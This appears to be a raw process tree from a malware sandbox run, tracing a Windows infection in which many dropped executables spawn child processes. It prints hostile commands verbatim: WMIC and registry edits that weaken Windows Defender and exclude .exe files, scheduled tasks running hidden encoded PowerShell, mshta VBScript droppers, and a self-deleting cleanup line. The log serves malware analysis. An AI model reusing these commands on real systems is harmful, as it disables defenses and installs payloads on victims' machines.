C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHcOQiMKC" /SC once /ST 01:13:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 02:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\LzIDqil.exe\" XY /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\0_5EyHbh3gn9wu3DDMKVbe2x.exe" ) do taskkill -iM "%~nxq" /f10⤵
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "0_5EyHbh3gn9wu3DDMKVbe2x.exe" /f11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\IdTIuEvxp8vtL3Y6tiyTVW50.exe"C:\Users\Admin\Documents\IdTIuEvxp8vtL3Y6tiyTVW50.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 2529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9h0juX45eflO0kUjSWERttjq.exe"C:\Users\Admin\Documents\9h0juX45eflO0kUjSWERttjq.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 3089⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\rodN7rVXJUbtdy2Ers_haaxl.exe"C:\Users\Admin\Documents\rodN7rVXJUbtdy2Ers_haaxl.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 3089⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\qeVAaKPbnGtNnwYgMKjlCI_r.exe"C:\Users\Admin\Documents\qeVAaKPbnGtNnwYgMKjlCI_r.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\Documents\aSh6oiR8qhgESodEwg1co944.exe"C:\Users\Admin\Documents\aSh6oiR8qhgESodEwg1co944.exe"8⤵
-
C:\Users\Admin\Documents\2f2AnaU5O3iDx3nMNnZpwE9j.exe"C:\Users\Admin\Documents\2f2AnaU5O3iDx3nMNnZpwE9j.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KR2IE.tmp\2f2AnaU5O3iDx3nMNnZpwE9j.tmp"C:\Users\Admin\AppData\Local\Temp\is-KR2IE.tmp\2f2AnaU5O3iDx3nMNnZpwE9j.tmp" /SL5="$103AC,506127,422400,C:\Users\Admin\Documents\2f2AnaU5O3iDx3nMNnZpwE9j.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-TKSKR.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-TKSKR.tmp\Chmenka.exe" /S /UID=12410⤵
-
C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe"C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ICQO4.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-ICQO4.tmp\IDownload.tmp" /SL5="$2030C,994212,425984,C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe" /VERYSILENT12⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu13⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c-hsfzrm.cmdline"14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CB2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1CB1.tmp"15⤵
-
C:\Users\Admin\AppData\Local\Temp\5d-78666-12f-0f585-9ca8525af83a1\Winaegecaede.exe"C:\Users\Admin\AppData\Local\Temp\5d-78666-12f-0f585-9ca8525af83a1\Winaegecaede.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Users\Admin\AppData\Local\Temp\44-3b390-e61-b16ae-2afb03aaf6b5e\Tejiwaekoco.exe"C:\Users\Admin\AppData\Local\Temp\44-3b390-e61-b16ae-2afb03aaf6b5e\Tejiwaekoco.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jan3noyn.cqr\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\jan3noyn.cqr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\jan3noyn.cqr\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 30414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f3botyfq.ndf\installer.exe /qn CAMPAIGN="654" & exit12⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\f3botyfq.ndf\installer.exeC:\Users\Admin\AppData\Local\Temp\f3botyfq.ndf\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xjfucdnu.0vx\anyname.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\xjfucdnu.0vx\anyname.exeC:\Users\Admin\AppData\Local\Temp\xjfucdnu.0vx\anyname.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygjyirqt.wer\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ygjyirqt.wer\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ygjyirqt.wer\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 30414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1wk2nmg.msl\autosubplayer.exe /S & exit12⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\CtdIF68bUqoF1YIoatKKhDHU.exe"C:\Users\Admin\Documents\CtdIF68bUqoF1YIoatKKhDHU.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qSEyiynEt2usFH1F3ILQKqqn.exe"C:\Users\Admin\Documents\qSEyiynEt2usFH1F3ILQKqqn.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im M6yxelA3v8dSsoMbE76obpxX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe" & del C:\ProgramData\*.dll & exit8⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im M6yxelA3v8dSsoMbE76obpxX.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Checks processor information in registry
- Delays execution with timeout.exe
- Enumerates system info in registry
-
C:\Users\Admin\Documents\ODUY8h_dRmSPnowXWsMuPfSv.exe"C:\Users\Admin\Documents\ODUY8h_dRmSPnowXWsMuPfSv.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\Documents\tbb_EBPH2NSFZl1dRJn3T23f.exe"C:\Users\Admin\Documents\tbb_EBPH2NSFZl1dRJn3T23f.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\faix46uT7fe2coyITPJI_gRZ.exe"C:\Users\Admin\Documents\faix46uT7fe2coyITPJI_gRZ.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\0AdgPZuLzdDXmeGBdZzAfKFP.exe"C:\Users\Admin\Documents\0AdgPZuLzdDXmeGBdZzAfKFP.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 2847⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\xaiTGuks31gRBwJQPjqa0zco.exe"C:\Users\Admin\Documents\xaiTGuks31gRBwJQPjqa0zco.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 2447⤵
- Program crash
-
C:\Users\Admin\Documents\bT8zIbHyWAmMcMjVcVQvdQAq.exe"C:\Users\Admin\Documents\bT8zIbHyWAmMcMjVcVQvdQAq.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\dUKKHs5vnqUP87SnnwiHWDjl.exe"C:\Users\Admin\Documents\dUKKHs5vnqUP87SnnwiHWDjl.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\y4wO4hM7qudHWZvXuMrAHxuB.exe"C:\Users\Admin\Documents\y4wO4hM7qudHWZvXuMrAHxuB.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\o3jVhWpzGcwB1rSJvh8Bh1Jy.exe"C:\Users\Admin\Documents\o3jVhWpzGcwB1rSJvh8Bh1Jy.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 2487⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\vvzQen9T8gn95mJC6pOP_HDo.exe"C:\Users\Admin\Documents\vvzQen9T8gn95mJC6pOP_HDo.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 3087⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\sqINKvqX_Z4207Sj2ScquzD3.exe"C:\Users\Admin\Documents\sqINKvqX_Z4207Sj2ScquzD3.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 2807⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\W2v6b5bjqpQBt1noCXNL0jMG.exe"C:\Users\Admin\Documents\W2v6b5bjqpQBt1noCXNL0jMG.exe"6⤵
-
C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF ""== "" for %w In ("C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe" ) do taskkill /F -iM "%~nxw"8⤵
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "KsVaEglcr_unmivRYj1qqzHr.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\GDhGY7j0oJbM3Xozvf7HGWwQ.exe"C:\Users\Admin\Documents\GDhGY7j0oJbM3Xozvf7HGWwQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\wqER3NvWNOXWCYzBLNICJiQQ.exe"C:\Users\Admin\Documents\wqER3NvWNOXWCYzBLNICJiQQ.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\8199809.scr"C:\Users\Admin\AppData\Roaming\8199809.scr" /S7⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6268 -s 21208⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\8235804.scr"C:\Users\Admin\AppData\Roaming\8235804.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri008493e5f0216a2ff.exe4⤵
-
